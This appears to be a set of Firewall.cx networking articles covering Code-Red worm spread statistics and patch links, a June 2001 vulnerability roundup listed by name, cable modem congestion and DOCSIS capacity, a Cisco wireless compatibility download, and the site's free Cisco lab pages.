A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.
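The radius formula quoted above is simple to evaluate; a quick check (Python, natural logarithm) shows how slowly the circles grow with host count:

from math import log

def circle_radius(total_infected_hosts):
    return 1 + log(total_infected_hosts)   # 1 + ln(total-infected-hosts)

for n in (1, 10, 1000):
    print(n, round(circle_radius(n), 2))   # 1.0, 3.3, 7.91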

Although we attempted to identify the geographic location of each host as accurately as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries. Thus, the rapidly expanding central regions of most countries are an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

Quicktime animation of growth by geographic breakdown (200K .mov - requires QuickTime v3 or newer)

  • Hits: 16309

Windows Bugs Everywhere!

Vulnerabilities, bugs and exploits will keep you on your toes

Every day a new exploit, bug, or vulnerability is found and reported on the Internet, in the news and on TV. Although Microsoft seems to get the greatest number of bug reports and alerts, it is not alone. Bugs are found in all operating systems, whether server software, desktop software or embedded systems.

Here is a list of bugs and flaws affecting Microsoft products that have been uncovered just in the month of June 2001:

  • MS Windows 2000 LDAP SSL Password Modification Vulnerability
  • MS IIS Unicode .asp Source Code Disclosure Vulnerability
  • MS Visual Studio RAD Support Buffer Overflow Vulnerability
  • MS Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability
  • MS SQL Server Administrator Cached Connection Vulnerability
  • MS Windows 2000 Telnet Privilege Escalation Vulnerability
  • MS Windows 2000 Telnet Username DoS Vulnerability
  • MS Windows 2000 Telnet System Call DoS Vulnerability
  • MS Windows 2000 Telnet Multiple Sessions DoS Vulnerability
  • MS W2K Telnet Various Domain User Account Access Vulnerability
  • MS Windows 2000 Telnet Service DoS Vulnerability
  • MS Exchange OWA Embedded Script Execution Vulnerability
  • MS Internet Explorer File Contents Disclosure Vulnerability
  • MS Outlook Express Address Book Spoofing Vulnerability


The sheer frequency and number of bugs being found do not bode well for Microsoft and the security of its programming practices. These are just the bugs that have been found and reported; bugs like the Internet Explorer flaw may have been around for months, quietly exploited and hidden from discovery by the underground community.

But it isn't just Microsoft that is plagued with bugs and vulnerabilities. All flavors of Linux have their share of serious bugs also. The vulnerabilities below have also been discovered or reported for the month of June 2001:

  • Procfs Stream Redirection to Process Memory Vulnerability
  • Samba remote root vulnerability
  • Buffer overflow in fetchmail vulnerability
  • cfingerd buffer overflow vulnerability
  • man/man-db MANPATH bugs exploit
  • Oracle 8i SQLNet Header Vulnerability
  • Imap Daemon buffer overflow vulnerability
  • xinetd logging code buffer overflow vulnerability
  • Open SSH cookie file deletion vulnerability
  • Solaris libsldap Buffer Overflow Vulnerability
  • Solaris Print Protocol buffer overflow vulnerability


These are not all of the bugs and exploits that affect *nix systems; at least as many *nix bugs were found in the month of June as were found in Microsoft products. Even the Macintosh OS, famous for being almost hacker proof, is also vulnerable. This is especially true with the release of OS X, because OS X is built on a BSD Unix core, so many of the BSD and other Unix vulnerabilities can also affect it. As an example, Macintosh OS X is subject to the sudo buffer overflow vulnerability.

Does all of this mean that you should just throw up your hands and give up? Absolutely not! Taken as a whole, the sheer number of bugs and vulnerabilities is massive and almost overwhelming. The point is that if you keep up with the latest patches and fixes, the job of keeping your OS secure is not so daunting.

Keeping up is simple if you just know where to look. Each major OS vendor keeps a section of its Web site dedicated to security, fixes and patches. Here is a partial list categorized by operating system:

Windows

TechNet Security Bulletins
The Microsoft TechNet section on security contains information on the latest vulnerabilities, bugs, patches and fixes. It also has a searchable database that you can search by product and service pack.

Linux

Since there are so many different flavors of Linux I will list some of the most popular ones here.

RedHat

Alerts and Errata
RedHat lists some of the most recent vulnerabilities here as well as other security links on the RedHat site and security links that can be found elsewhere on the Web.

Slackware

Security Mailing List Archives
Although not as well organized as the Microsoft or RedHat sites, the mailing list archives contain a wealth of information. The archive is organized by year and then by month.

SuSE

SuSE Linux Homepage
Included here is an index of alerts and announcements on SuSE security. There is also a link to subscribe to the SuSE Security Mailing list.

Solaris

Security
This is one of the most comprehensive and complete security sites of all of the OSs. If you can't find it here, you won't find it anywhere.

Macintosh

Apple Product Security
Even though the Mac is not as prone to security problems as other OSs, you should still take steps to secure your Mac. With the introduction of OS X, security will be more of a concern.
  • Hits: 14190

The Cable Modem Traffic Jam

Tie-ups that slow broadband Internet access to a crawl are a reality--but solutions are near at hand
The Cable Modem Traffic Jam

articles-connectivity-cmtj-1-1

Broadband access to the Internet by cable modem promises users lightning-fast download speeds and an always-on connection. And recent converts to broadband from dial-up technology are thrilled with complex Web screens that download before their coffee gets cold.

But, these days, earlier converts to broadband are noticing something different. They are seeing their Internet access rates slow down, instead of speed up. They are sitting in a cable modem traffic jam. In fact, today, a 56K dial-up modem can at times be faster than a cable modem and access can be more reliable.

Other broadband service providers--digital subscriber line (DSL), integrated-services digital networks (ISDNs), satellite high-speed data, and microwave high-speed data--have their own problems. In some cases, service is simply not available; in other situations, installation takes months, or the costs are wildly out of proportion. Some DSL installations work fine until a saturation point of data subscribers per bundle of twisted pairs is reached, when the crosstalk between the pairs can be a problem. 

In terms of market share, the leaders in providing broadband service are cable modems and DSL as shown below:

articles-connectivity-cmtj-2-1

But because the cable modem was the first broadband access technology to gain wide popularity, it is the first to face widespread traffic tie-ups. These tie-ups have been made visible by amusing advertisements run by competitors, describing the "bandwidth hog" moving into the neighborhood. In one advertisement, for example, a new family with teenagers is seen as a strain on the shared cable modem interconnection and is picketed. (The message is that this won't happen with DSL, although that is only a half-truth.)

So, today, the cable-modem traffic jam is all too real in many cable systems. In severe cases, even the always-on capability is lost. Still, it is not a permanent limitation of the system. It is a temporary problem with technical solutions, if the resources are available to implement the fixes. But during the period before the corrections are made, the traffic jam can be a headache.

Cable modem fundamentals

Today's traffic jam stems from the rapid acceptance of cable broadband services by consumers. A major factor in that acceptance was the 1997 standardization of modem technology that allowed consumers to own the in-home hardware and be happy that their investment would not be orphaned by a change to another cable service provider.

A cable modem system can be viewed as having several components:

articles-connectivity-cmtj-3-1

The cable modem connects to the subscriber's personal computer through the computer's Ethernet port. The purpose of this connection is to facilitate a safe hardware installation without the need for the cable technician to open the consumer's PC. If the PC does not have an Ethernet socket, commercially available hardware and software can be installed by the subscriber or by someone hired by the subscriber.

Downstream communication (from cable company headend to cable subscriber's modem) is accomplished with the same modulation systems used for cable digital television. There are two options, both using packetized data and quadrature amplitude modulation (QAM) in a 6-MHz channel, the bandwidth of an analog television channel. QAM consists of two sinusoidal carriers that are phase shifted 90 degrees with respect to each other (that is, the carriers are in quadrature with each other) and each is amplitude modulated by half of the data. The slower system uses 64 QAM with an approximate raw data rate of 30 Mb/s and a 27-Mb/s payload information rate (which is the actual usable data throughput after all error correction and system control bits are removed). The faster system uses 256 QAM with an approximate raw data rate of 43 Mb/s and a payload information rate of 39 Mb/s.

With 64 QAM, each carrier is amplitude modulated with one of eight amplitude levels. The product of the two numbers of possible amplitude levels is 64, meaning that one of 64 possible pieces of information can be transmitted at a time. Since 2^6 is 64, with 64 QAM modulation, 6 bits of data are transmitted simultaneously. Similarly, with 256 QAM, each carrier conveys one of 16 amplitude levels, and since 256 is 2^8, 8 bits of data are transmitted simultaneously. The higher speed is appropriate for newer or upgraded cable plant, while the lower speed is more tolerant of plant imperfections, such as the ingress of interfering signals and reflected signals from transmission line impedance discontinuities.
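The arithmetic behind these figures can be checked directly: bits per symbol is log2 of the constellation size, and comparing the payload rates quoted above shows that moving from 64 QAM to 256 QAM buys roughly 50 percent more throughput, not four times more. A quick Python sketch, using only the rates stated in this article:

from math import log2

payload_mbps = {"64 QAM": 27, "256 QAM": 39}   # payload rates quoted above

for name, rate in payload_mbps.items():
    points = int(name.split()[0])
    print(f"{name}: {int(log2(points))} bits per symbol, payload {rate} Mb/s")

increase = payload_mbps["256 QAM"] / payload_mbps["64 QAM"] - 1
print(f"256 QAM payload is about {increase:.0%} larger than 64 QAM")   # ~44%, i.e. roughly 50%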

The upstream communications path (from cable modem to cable headend) resides in a narrower, more challenged spectrum. A large number of interference sources limit the upstream communication options and speeds. Signals leak into the cable system through consumer-owned devices, through the in-home wiring, the cable drop, and the distribution cable. Fortunately, most modern cable systems connect the neighborhood to the headend with optical fiber, which is essentially immune to interfering electromagnetic signals. A separate fiber is usually used for the upstream communications from each neighborhood. Also, the upstream bandwidth is not rigorously partitioned into 6-MHz segments.

Depending on the nature of the cable system, one or more of a dozen options for upstream communications are utilized. The upstream bandwidth and frequency are chosen by the cable operator so as to avoid strong interfering signals.

The cable modem termination system (CMTS) is an intelligent controller that manages the system operation. Managing the upstream communications is a major challenge because all of the cable modems in the subscriber's area are potentially simultaneous users of that communications path. Of course, only one cable modem can instantaneously communicate upstream on one RF channel at a time. Since the signals are packetized, the packets can be interleaved, but they must be timed to avoid collisions.
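As a rough mental model only (this is not the actual DOCSIS MAC protocol), the headend can be thought of as handing out non-overlapping upstream transmission windows, so that bursts from different modems never collide. A toy round-robin version of that idea, with hypothetical modem names:

from itertools import cycle

def grant_schedule(modems, slots_per_cycle):
    # Assign each upstream time slot to exactly one modem, in turn.
    order = cycle(modems)
    return [(slot, next(order)) for slot in range(slots_per_cycle)]

for slot, modem in grant_schedule(["modem-A", "modem-B", "modem-C"], 6):
    print(f"slot {slot}: {modem} may transmit")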

The 1997 cable modem standard included the possibility of an upstream telephone communications path for cable systems that have not implemented two-way cable. Such one-way cables have not implemented an upstream communications path from subscriber to headend. Using a dial-up modem is a practical solution since most applications involve upstream signals that are mainly keystrokes, while the downstream communications includes much more data-intensive messages that fill the screen with colorful graphics and photographs and even moving pictures and sound. The CMTS system interfaces with a billing system to ensure that an authorized subscriber is using the cable modem and that the subscriber is correctly billed.

The CMTS manages the interface to the Internet so that cable subscribers have access to more than just other cable subscribers' modems. This is accomplished with a router that links the cable system to the Internet service provider (ISP), which in turn links to the Internet. The cable company often dictates the ISP or may allow subscribers to choose from among several authorized ISPs. The largest cable ISP is @Home, which was founded in 1995 by TCI (now owned by AT&T), Cox Communications, Comcast, and others. Another ISP, Road Runner, was created by Time Warner Cable and MediaOne, which AT&T recently purchased.

Cable companies serving 80 percent of all North American households have signed exclusive service agreements with @Home or Road Runner. Two more cable ISPs--High Speed Access Corp. and ISP Channel--serve the remaining U.S. and Canadian broadband households. And other major cable companies, CableVision and Adelphia in the United States and Videotron in Canada, offer their own cable modem service.

Cable modem bottlenecks

If there were just one cable modem in operation, it could in principle have an ultimate data download capacity of 27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system. While 256 is four times 64, the data capacity does not scale by this factor, since the 8 bits simultaneously transmitted by 256 QAM are not four times the 6 bits simultaneously transmitted by 64 QAM. The 256 QAM data rates are only about 50 percent larger than the 64 QAM rates. Of course, if the cable modem is not built into a PC but is instead connected with an Ethernet link, the Ethernet connection is a bottleneck, albeit at 10 Mb/s. In any case, neither of these bottlenecks is likely to bring any complaints, since downloads at these speeds would be wonderful.

A much more likely bottleneck is in the cable system's connection to the Internet or in the Internet itself or even the ultimate Web site. For example, Ellis Island recently opened its Web site to citizens to let them search for their ancestors' immigration records, and huge numbers of interested users immediately bogged down the site. No method of subscriber broadband access could help this situation since the traffic jam is at the information source. A chain is only as strong as its weakest link; if the link between the cable operator and the ISP has insufficient capacity to accommodate the traffic requested by subscribers, it will be overloaded and present a bottleneck.

This situation is not unique to a cable modem system. Any system that connects subscribers to the Internet will have to contract for capacity with an ISP or a provider of connections to the Internet backbone, and that capacity must be shared by all the service's subscribers. If too little capacity has been ordered, there will be a bottleneck. This limitation applies to digital subscriber line systems and their connections to the Internet just as it does to cable systems. If the cable operator has contracted with an ISP, the ISP's Internet connection is a potential bottleneck, because it also serves other customers. Of course, the Internet itself can be overloaded as it races to build infrastructure in step with user growth.

Recognizing that the Internet itself can slow things down, cable operators have created systems that cache popular Web sites closer to the user and that contain local sites of high interest. These sites reside on servers close to the subscriber and reduce dependence on access to the Internet. Such systems have been called walled gardens because they attempt to provide a large quantity of interesting Web pages to serve the subscriber's needs from just a local server. Keeping the subscriber within the walled garden not only reduces the demand on the Internet connection, but can also make money for the provider through the sale of local advertising and services. This technique can become overloaded as well. But curing this overload is relatively easy with the addition of more server capacity (hardware) at the cache site.

Two cable ISPs, Road Runner and @Home, were designed to minimize or avoid Internet bottlenecks. They do it by leasing virtual private networks (VPNs) to provide nationwide coverage. VPNs consist of guaranteed, dedicated capacity, which will ensure acceptable levels of nationwide data transport to local cable systems. @Home employs a national high-speed data backbone through leased capacity from AT&T. Early on, a number of problems caused traffic jams, but these are now solved.

Other potential bottlenecks are the backend systems that control billing and authorization of the subscriber's service. As cable modem subscriber numbers grow, these systems must be able to handle the load.

The capacity on the cable system is shared by all the cable modems connected to a particular channel on a particular node. Cable systems are divided into physical areas of several hundred to a few thousand subscribers, each of which is served by a node. The node converts optical signals coming from (and going to) the cable system's headend into radio frequency signals appropriate for the coaxial cable system that serves the homes in the node area:

articles-connectivity-cmtj-4-1

Only the cable modems being used at a particular time fight for sizable amounts of the capacity. Modems that are connected but idle are not a serious problem, as they use minimal capacity for routine purposes.

Clearly, success on the part of a cable company can be a source of difficulty if it sells too many cable modems to its subscribers for the installed capacity. The capacity of a given 6-MHz channel assigned to the subscribers' neighborhood and into their premises is limited to the amounts previously discussed (27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system) and the demand for service can exceed that capacity. Both upstream and downstream bandwidth limitations can hinder performance. Upstream access is required to request downloads and to upload files. Downstream access provides the desired information.
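A back-of-the-envelope calculation makes the sharing problem concrete: divide the per-channel payload rate by the number of modems actively downloading at the same moment. The subscriber counts below are hypothetical:

def per_user_mbps(channel_payload_mbps, active_modems):
    # Even split of one downstream channel among simultaneously active modems.
    return channel_payload_mbps / active_modems

for active in (1, 10, 50, 200):
    rate = per_user_mbps(27, active)   # 27 Mb/s payload of a 64 QAM channel
    print(f"{active:>3} active modems: about {rate:.2f} Mb/s each")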

Usually, it is the downstream slowdown that is noticed. Some browsers (the software that interprets the data and paints the images on the computer screen) include so-called fuel gauges or animated bar graphs that display the progress of the download. They can be satisfying when they zip along briskly, but rub salt in the wound when they crawl slowly and remind the user that time is wasting.

Bandwidth hogs in a subscriber's neighborhood can be a big nuisance. As subscribers attempt to share large files, like music, photos, or home movies, they load up the system. One of the rewards of high-speed Internet connections is the ability to enjoy streaming video and audio. Yet these applications are a heavy load on all parts of the system, not just the final link. System capacity must keep up with both the number of subscribers and the kinds of applications they demand. As the Internet begins to look more like television with higher-quality video and audio, it will require massive downstream capacity to support the data throughput. As the Internet provides more compelling content, it will attract even more subscribers. So the number of subscribers grows and the bandwidth each demands also grows. Keeping up with this growth is a challenge.

Impact of open access

Open access is the result of a fear on the part of the government regulators that cable system operators will be so successful in providing high-speed access to the Internet that other ISPs will be unable to compete. The political remedy is to require cable operators to permit competitive ISPs to operate on their systems. Major issues include how many ISPs to allow, how to integrate them into the cable system, and how to charge them for access. The details of how open access is implemented may add to the traffic jam.

A key component in dealing with open access is the CMTS. The ports on the backend of this equipment connect to the ISPs. But sometimes too few ports are designed into the CMTS for the number of ISPs wishing access. More recent CMTS designs accommodate this need. However, these are expensive pieces of equipment, ranging up to several hundreds of thousands of dollars. An investment in an earlier unit cannot be abandoned without great financial loss.

If the cost of using cable modem access is fairly partitioned between the cost of using the cable system and the access fees charged by the cable company, then the cable operator is fairly compensated for the traffic. With more ISPs promoting service, the likelihood is that there will be more cable modem subscribers and higher usage. This, of course, will contribute to the traffic jam. In addition, the backend processing of billing and cable modem authorization can be a strain on the system.

What to do about the traffic jam?

The most important development in dealing with all these traffic delays is the release of the latest version of the cable modem technical standard. Docsis Release 1.1 (issued by CableLabs in 1999) includes many new capabilities, of which the most pertinent in this context is quality of service (QoS). In most aspects of life, the management of expectations is critical to success. When early adopters of cable modem service shared a lightly loaded service, they became accustomed to lightning access. When more subscribers were added, the loading of the system lowered speed noticeably for each subscriber in peak service times.

Similarly, the difference between peak usage times and the late night or early morning hours can be substantial. It is not human nature to feel grateful for the good times while they last, but rather to feel entitled to good times all the time. The grades of service provided by QoS prevent the buildup of unreasonable expectations and afford the opportunity to contract for guaranteed levels of service. Subscribers with a real need for speed can get it on a reliable basis by paying a higher fee while those with more modest needs can pay a lower price. First class, business class, and economy can be implemented with prices to match.
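As a minimal illustration of the tiering idea (not the DOCSIS 1.1 mechanism itself; the tier names and rates below are hypothetical), each grade of service can be expressed as a rate cap to which a subscriber's traffic is clamped:

TIERS = {"economy": 1.0, "business": 3.0, "first": 8.0}   # maximum Mb/s per tier

def granted_rate(requested_mbps, tier):
    # A subscriber never receives more than the cap of the tier purchased.
    return min(requested_mbps, TIERS[tier])

print(granted_rate(6.0, "economy"))   # 1.0 - throttled to the tier cap
print(granted_rate(6.0, "first"))     # 6.0 - within the purchased tier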

Beefing up to meet demand

Network traffic engineering is the design and allocation of resources to satisfy demand on a statistical basis. Any economic system must deal with peak loads while not being wasteful at average usage times. Consumers find it difficult to get a dial tone on Mother's Day, because it would be impractically expensive to have a phone system that never failed to provide dial tone. The same is true of a cable modem system. At unusually high peaks, service may be temporarily delayed or even unavailable.

An economic design matches the capacity of all of the system elements so that no element is underutilized while other elements are under constant strain. This means that a properly designed cable modem system will not have one element reach its maximum capacity substantially before other elements are stressed. There should be no weakest links. All links should be of relatively the same capacity.

More subscribers can be handled by allocating more bandwidth. Instead of just one 6-MHz channel for cable modem service, two or more can be allocated, along with the hardware and software to support this bandwidth. Since many cable systems are capacity limited, the addition of another 6-MHz channel can be accomplished only by sacrificing the service already assigned to it. A typical modern cable system would have a maximum frequency of about 750 MHz. This allows for 111 or so 6-MHz channels to be allocated to conflicting demands. Perhaps 60-75 of them carry analog television. The remainder are assigned to digital services such as digital television, video on demand, broadband cable service, and telephony.

Canceling service to free up bandwidth for cable modems may cause other subscriber frustrations. While adding another 6-MHz channel solves the downstream capacity problem, if the upstream capacity is the limiting factor in a particular cable system, merely adding more 6-MHz channels will still leave a traffic jam. The extra channels help with only one of the traffic directions.

Cable nodalization is another important option in cable system design for accommodating subscriber demand. Nodalization is essentially the dividing up of the cable system into smaller cable systems, each with its own path to the cable headend. The neighborhood termination of that path is called a node. In effect, then, several cables, instead of a single cable, come out of the headend to serve the neighborhoods.

Cable system nodes cater to anywhere from several thousand subscribers to just a few hundred. Putting in more nodes is costly, but the advantage of nodalization is that the same spectrum can be used differently at each node. A specific 6-MHz channel may carry cable modem bits to the users in one node while the same 6-MHz channel carries completely different cable modem bits to other users in an adjacent node. This has been called space-division multiplexing since it permits different messages to be carried, depending on the subscriber's spatial location.

An early example of this principle was deployed in the Time Warner Cable television system in Queens, New York City. Queens is a melting pot of nationalities. The immigrants there tend to cluster in neighborhoods where they have relatives and friends who can help them make the transition to the new world. The fiber paths to these neighborhoods can use the same 6-MHz channel for programs in different languages. So a given channel number can carry Chinese programming on the fiber serving that neighborhood, Korean programming on another fiber, and Japanese programming on still another fiber. As the 747s fly into the John F. Kennedy International Airport in Queens each night, they bring tapes from participating broadcasters in other countries that become the next day's programming for the various neighborhoods. (Note that this technique is impossible in a broadcast or satellite transmission system since such systems serve the entire broadcast area and cannot employ nodalization.)

The same concept of spectrum reuse is applied to the cable modem. A 6-MHz channel set aside for this purpose carries the cable modem traffic for the neighborhood served by its respective node. While most channels carry the same programming to all nodes, just the channel(s) assigned to the modem service carry specialized information directed to the individual nodes. Importantly, nodalization reuses the upstream spectrum as well as the downstream spectrum. So, given enough nodes, traffic jams are avoided in both directions.
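The payoff of nodalization is easy to see with rough numbers: because each node carries its own copy of the cable-modem channel, aggregate capacity grows with the node count even though the channel itself does not change. The node counts below are hypothetical:

def aggregate_capacity_mbps(nodes, channels_per_node=1, payload_mbps=27):
    # Spectrum reuse: every node carries its own instance of the same channel(s).
    return nodes * channels_per_node * payload_mbps

for nodes in (1, 4, 16):
    print(f"{nodes:>2} nodes -> {aggregate_capacity_mbps(nodes)} Mb/s total downstream capacity")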

However, nodalization is costly. Optical-fiber paths must be installed from the headend to the individual nodes. The fiber paths require lasers and receivers to convert the optical signals into electrical signals for the coaxial cable in the neighborhood. Additional modulators per node are required at the cable headend, as well as routers to direct the signals to their respective lasers. The capital investment is substantial. However, it is technically possible to solve the problem. (In principle, nodalization could be implemented in a fully coaxial cable system. But in practice coaxial cable has much higher losses than fiber and incurs even greater expense in the form of amplifiers and their power supplies.)

Other techniques for alleviating the traffic jam include upgrading the cable system so that 256 QAM can be used instead of 64 QAM downstream and 16 QAM can be used upstream instead of QPSK. If the ISP's connection to the Internet is part of the problem, a larger data capacity connection to the Internet backbone can be installed.

Also, non-Docsis high-speed access systems are under development for very heavy users. These systems will provide guaranteed ultrahigh speeds of multiple megabits per second in the downstream direction while avoiding the loading of the Docsis cable modem channels. The service can then be partitioned into commercial and residential or small business services that do not limit each other's capabilities.

Speculations on the future

The cable modem traffic jam is due to rapid growth that sometimes outpaces the resources available to upgrade the cable system. But solutions may be near at hand.

The next wave of standardization, Docsis 1.1 released in 1999, provides for quality-of-service segmentation of the market. Now that the standard is released, products are in development by suppliers and being certified by CableLabs. Release 1.1 products will migrate into the subscriber base over the next several years. Subscribers will then be able to choose the capacity they require for their purposes and pay an appropriate fee. The effect will be to discourage bandwidth hogs and ensure that those who need high capacity, and are willing to pay for it, get it. And market segmentation will provide financial justification to implement even more comprehensive nodalization. After enough time has passed for these system upgrades to be deployed, the traffic jam should resolve itself.

  • Hits: 18581
Cisco WLC & AP Compatibility Matrix Download

Complete Cisco WLC Wireless Controllers, Aironet APs & Software Compatibility Matrix - Free Download

Firewall.cx's download section now includes the Cisco WLC Wireless Controllers Compatibility Matrix as a free download. The file contains two PDFs with an extensive list of all old and new Cisco Wireless Controllers and their supported Access Points across a diverse range of firmware versions.

The WLC compatibility list includes: WLC 2100, 2504, 3504, 4400, 5508, 5520, 7510, 8510, 8540, Virtual Controller, WiSM, WiSM2, SRE, 9800 series and more.

Access Point series compatibility list includes: 700, 700W, 1000, 1100, 1220, 1230, 1240, 1250, 1260, 1300, 1400, 1520, 1530, 1540, 1550, 1560, 1600, 1700, 1800, 2600, 2700, 2800, 3500, 3600, 3700, 3800, 4800, IW6300, 9100, 9130, 9160,

The compatibility matrix PDFs provide an invaluable map, ensuring that your network components are supported across different software versions. Make informed choices, plan upgrades with precision, and optimize your network's performance effortlessly.

Check the compatibility between various WLC hardware & virtual versions, Access Points and a plethora of Cisco software offerings, such as Cisco Identity Services Engine (ISE), Cisco Prime Infrastructure, innovative Cisco Spaces, and the versatile Mobility Express. This compatibility matrix extends far beyond devices, painting a holistic picture of how different elements of your Cisco ecosystem interact with one another.

Click here to visit the download page.

  • Hits: 2956

Firewall.cx: 15 Years’ Success – New Logo – New Identity – Same Mission

This December (2015) is a very special one. It signals 15 years of passion, education, learning, success and non-stop ‘routing’ of knowledge and technical expertise to the global IT community.

What began 15 years ago as a small pitiful website, with the sole purpose of simplifying complicated networking & security concepts and sharing them with students, administrators, network engineers and IT Managers, went on to become one of the most recognised and popular network security websites in the world.

Thanks to a truly dedicated and honest team, created mainly after our forums kicked in on the 24th of October 2001, Firewall.cx was able to rapidly expand and produce more high-quality content that attracted not only millions of new visitors but also global vendors.

Our material was suddenly being used at colleges and universities and referenced by thousands of engineers and sites around the world; then Cisco Systems referenced Firewall.cx resources in its official global CCNA Academy Program!

Today we look back and feel extremely proud of our accomplishments and, after all the recognition, positive feedback from millions and success stories from people who moved forward in their professional careers thanks to Firewall.cx, we feel obligated to continue working hard to help this amazing IT community.

Readers who have been following Firewall.cx since the beginning will easily identify the colourful Firewall.cx logo that has been with us since the site first went online. While we’ve changed the site’s design & platform multiple times the logo has remained the same, a piece of our history to which users can relate.

Obviously times have changed since 2000 and we felt (along with many other members) that it was time to move forward and replace our logo with one that will better suit the current Firewall.cx design & community, but at the same time make a real statement about who we are and what our mission is.

So, without any further delay, we would like to present to our community the new Firewall.cx logo:

Firewall.cx - New Logo - The Site for Networking Professionals

 

Explaining Our New Logo

Our new logo communicates what Firewall.cx and its community are all about. The new slogan precisely explains what we do: Route (verb) Information (knowledge) and Expertise to our audience of Network Professionals – that’s you. Of course, we still remain The No.1 Site for Networking Professionals :)

The icon on the left is a unique design that tells two stories:

  1. It’s a router, similar to Cisco’s popular Visio router icons, symbolising the “routing” process of information & expertise mentioned in our slogan.
  2. It symbolises four IT professionals: three represent our community (red) – that’s you, and the fourth (blue) is the Firewall.cx team. All four IT professionals are connected (via their right arm) and share information with each other (the arrows).

We hope our readers will embrace the new logo as much as we did and continue to use Firewall.cx as a trusted resource for IT Networking and Security topics.

On behalf of the Firewall.cx Team - Thank you for all your support. We wouldn’t be here without you.

Chris Partsenidis
Founder & Editor-in-Chief
  • Hits: 6911

Firewall.cx Free Cisco Lab: Equipment Photos

Our Cisco lab equipment has been installed in a 26U, 19-inch rack, complemented by blue neon lighting and a 420VA UPS to keep everything running smoothly, should a blackout occur.

The pictures taken show equipment used in all three labs. Please click on the picture of your choice to load a larger version.

cisco-lab-pictures-3-small

The 2912XL responsible for segmenting the local network, ensuring each lab is kept in its own isolated environment.


cisco-lab-pictures-7
Cisco Lab No.1 - The lab's Catalyst 1912 supporting two cascaded 1603R routers, and a 501 PIX Firewall.



cisco-lab-pictures-6
Cisco Lab No.2 - The lab's two 1603R routers.




cisco-lab-pictures-6
Cisco Lab No.3 - Three high-end Cisco switches flooded in blue lighting, making VLAN services a reality.




Cisco Lab No.3 - Optical links connecting the three switches together, permitting complex STP scenarios.

  • Hits: 20379

Firewall.cx Free Cisco Lab: Tutorial Overview

The Free Cisco lab tutorials were created to help our members get the most out of our labs by providing a step-by-step guide to completing specific tasks that vary in difficulty and complexity.

While you are not restricted to these tutorials, we do recommend you take the time to read through them as they cover a variety of configurations designed to enhance your knowledge and experience with these devices.

As one would expect, the first tutorials are simple and designed to help you move gradually into deeper waters. As you move on to the rest of the tutorials, the difficulty will increase noticeably, making the tutorials more challenging.

NOTE: In order to access our labs, you will need to open TCP ports 2001 to 2010. These ports are required so you can telnet directly into the equipment.

Following is a list of available tutorials:

Task 1: Basic Router & Switch Configuration

Router: Configure router's hostname and Ethernet interface. Insert a user mode and privilege mode password, enable secret password, encrypt all passwords, configure VTY password. Perform basic connectivity tests, check nvram, flash and system IOS version. Create a banner motd.

Switch: Configure switch's hostname, Ethernet interface, System name, Switching mode, Broadcast storm control, Port Monitoring, Port configuration, Port Addressing, Network Management, Check Utilisation Report and Switch statistics.

Task 2: Intermediate Router Configuration

Configure the router to place an ISDN call toward a local ISP using PPP authentication (CHAP & PAP). Set the appropriate default gateway for this stub network and configure simple NAT Overload to allow internal clients to access the Internet. Ensure the call is disconnected after 5 minutes of inactivity.

Configure Access Control Lists to restrict telnet access to the router from the local network. Create a local user database to restrict telnet access to specific users.

Block all ICMP packets originating from the local LAN towards the Internet and allow the following Internet services to the local LAN: www, dns, ftp, pop & smtp. Ensure you apply the ACLs to the router's private interface.

Block all incoming packets originating from the Internet.

  • Hits: 28784

Firewall.cx Free Cisco Lab: Our Partners

Our Cisco Lab project is a world first; there is no other Free Cisco Lab offered anywhere in the world! The technical specifications and quality of our lab mark a new milestone in free online education, matching the spirit in which this site was created.

While the development of our lab continues we publicly acknowledge and thank the companies that have made this dream a reality from which you can benefit, free of charge!

Each contributor is recognised as a Gold or Silver Partner.

cisco-lab-partners-1

logo-gfi
cisco-lab-partners-datavision

cisco-lab-partners-2

cisco-lab-partners-symantecpress

cisco-lab-partners-ciscopress

cisco-lab-partners-prenticehall

cisco-lab-partners-addison-wesley
  • Hits: 16639

Firewall.cx Free Cisco Lab: Access and Help

Connecting to the Lab Equipment

In order to access our equipment, the user must initiate a 'telnet' session to each device. The telnet session may be initiated using either of the following two ways:

1) By clicking on the equipment located on the diagram above. If your web browser supports external applications, once you click on a diagram's device, a dos-based telnet window will open and you'll receive the Cisco Lab welcome screen.

Note: The above method will NOT work with Internet Explorer 7, due to security restrictions.

